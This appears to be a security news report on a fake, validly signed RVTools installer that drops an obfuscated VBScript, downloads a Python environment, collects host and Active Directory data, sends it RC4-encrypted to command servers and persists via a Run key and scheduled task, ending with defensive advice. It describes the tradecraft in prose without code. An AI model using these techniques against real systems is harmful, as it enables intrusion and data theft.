Malicious RVTools Installer Abuses Sectigo Certificate to Bypass SmartScreen Warnings

A trusted tool for VMware administrators has been weaponized. Attackers built a fake version of RVTools, a widely used utility for managing virtual infrastructure, and disguised it with a real digital certificate to slip past Windows security warnings without raising a flag. RVTools is a staple in enterprise environments. IT administrators rely on it daily to get detailed visibility into virtual machines and infrastructure. Because it is typically run by people with high-level domain access, it made for a perfect impersonation target. Whoever built this fake installer knew that, crafting a campaign to exploit the trust that enterprise teams place in signed software.

Analysts at K7 Security Labs identified and reported the attack in detail. The fake installer carried a valid code-signing certificate issued by Sectigo, registered under what appears to be a shell entity called Xiamen Lunwei Huage Network Co., Ltd. At the time of delivery, the certificate was fully valid, meaning Windows SmartScreen and most endpoint controls raised no warnings. What followed was a fully structured, three-stage attack. The malware dropped a hidden script inside the installer, ran a quiet reconnaissance sweep of the victim's system, and established a persistent remote access channel that phoned home every five minutes.

The installer used a digitally signed MSI file paired with a standard End-User License Agreement to build a convincing layer of false legitimacy. Once a user ran the file and granted administrative privileges, the installer quietly triggered a hidden VBScript stored inside the MSI's binary table. This script used decimal-to-character encoding to hide its real instructions, ensuring security scanners saw nothing alarming. It then spawned a hidden PowerShell process that downloaded a roughly 33MB archive called winp.zip from a Dropbox link and extracted it into the AppData folder. The archive contained a portable Python environment including VS Code, Spyder, Jupyter Lab, and PowerShell, burying malicious scripts among dozens of trusted tools.

After a reboot prompt framed as cleaning up installation files, persistence mechanisms activated quietly in the background. Two Python scripts got to work. The first, collector.py, performed a deep sweep of the host, gathering the hostname, MAC address, user privileges, installed services, running processes, and Active Directory details. It hashed those identifiers into a unique eight-character ID so the attacker could track the victim even across IP address changes. All collected data was saved into a file called configA.json in the temp folder. The second script, Pmanager.py, encrypted that data using RC4 combined with zlib compression and sent it to one of five hardcoded command-and-control server addresses over HTTP POST requests.

The RAT beaconed every 300 seconds and could receive instructions to run executables, launch PowerShell commands, download additional payloads, or remove itself from the machine entirely. To survive reboots, it wrote a Windows Registry Run entry and created a scheduled task running with SYSTEM-level privileges. The certificate has since been revoked, but this only offers limited protection to environments not enforcing real-time certificate checks at execution. Any environment relying solely on static signature validation would have seen nothing suspicious.

Organizations using VMware should verify that any RVTools installer was downloaded directly from the official website at robware.net. Security teams are advised to monitor for unexpected winp.zip files in AppData directories, watch for Python processes launched from unusual paths, and enforce real-time certificate revocation checks at execution. Blocking outbound connections to unknown IP addresses from administrative workstations adds meaningful protection against attacks like this one.